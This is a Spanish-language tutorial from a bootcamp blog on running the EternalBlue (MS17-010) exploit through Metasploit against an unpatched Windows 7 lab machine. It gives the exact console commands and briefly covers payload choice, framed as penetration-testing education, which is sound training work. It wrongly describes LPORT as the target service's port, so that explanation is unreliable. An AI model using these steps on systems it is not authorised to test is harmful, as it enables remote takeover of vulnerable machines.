¿Cómo usar EternalBlue con Metasploit?

Autor: | Última modificación: 18 de abril de 2024 | Tiempo de Lectura: 2 minutos

Algunos de nuestros reconocimientos:

Premios KeepCoding

¿Sabes cómo usar EternalBlue con Metasploit y qué nos permite hacer este exploit?

EternalBlue es un exploit que fue filtrado en el año 2017 por el grupo de hackers informáticos The Shadow Brokers. Supuestamente, el programa fue desarrollado por la NSA para explotar vulnerabilidades del servicio de Microsoft Server Message Block, que permiten hacer ejecución remota de código en el ordenador comprometido.

El exploit EternalBlue se utilizó para propagar el ataque con ransomware WannaCry y aún se utiliza en ejercicios de pentesting para poner a prueba sistemas con esta vulnerabilidad. A continuación, te enseñaremos cómo usar EternalBlue con Metasploit.

¿Cómo usar el exploit EternalBlue con Metasploit?

Antes de ver cómo usar el exploit EternalBlue con Metasploit, es necesario aclarar que este tutorial está hecho con fines académicos, bajo el propósito de que se utilice para aprender y mejorar la seguridad de los sistemas informáticos.

  1. Primero, debes crear dos máquinas virtuales con tu software de virtualización preferido. En una de ellas, instala una versión de Windows 7 sin el parche de seguridad MS17-010 y, en la otra, instala el sistema operativo para seguridad informática Kali Linux.
  2. Metasploit es un framework que viene instalado por defecto en Kali. Para ejecutarlo, abre una terminal en cualquier directorio y escribe el comando «msfconsole». Al presionar la tecla enter, abrirás la consola de Metasploit.
  3. Para buscar el exploit EternalBlue, escribe el comando «search eternalblue» en la consola de Metasploit.
  4. Selecciona la opción exploit/windows/smb/ms17_010_eternalblue, utilizando el comando «use exploit/windows/smb/ms17_010_eternalblue«.
  5. Ahora, ejecuta la opción «show options» para desplegar información sobre las variables que debes rellenar para usar el expolit.
  6. Tendrás que rellenar las variables «LPORT» con el número de puerto en el que se halla el servicio a explotar y «RHOSTS» con la dirección IP de la máquina vulnerable. Para conocer la dirección IP de la máquina con Windows 7, dirígete a ella, abre una terminal y ejecuta el comando «ipconfig». Para establecer las variables, ejecuta los comandos «set LPORT 6666» y «set RHOSTS ip de la máquina Win7«.
  7. Para ejecutar el exploit, utiliza el comando «exploit«.

Metasploit también incluye herramientas de postexplotación, así que si quieres configurar un payload con EternalBlue, utiliza el comando «set payload» y escoge entre las diferentes opciones. De no cumplir con este proceso, el framework elegirá un payload por defecto y, si no especificas ciertos valores para el mismo, no se ejecutará ninguna tarea en el ordenador comprometido.

¿Cómo aprender más?

Ahora sabes cómo usar el exploit EternalBlue con Metasploit. Si quieres aprender más técnicas de pentesting, no te puedes perder la oportunidad que te ofrece nuestro Ciberseguridad Full Stack Bootcamp. Aprenderás en vivo sobre temas como hacking ético, análisis de malware, criptografía y análisis forense, entre muchos otros, y conseguirás convertirte en todo un experto en pocos meses. ¡Entra ahora y pide más información!

Posts Relacionados

¡CONVOCATORIA ABIERTA!

Ciberseguridad

Full Stack Bootcamp

Clases en Directo | Profesores en Activo | Temario 100% actualizado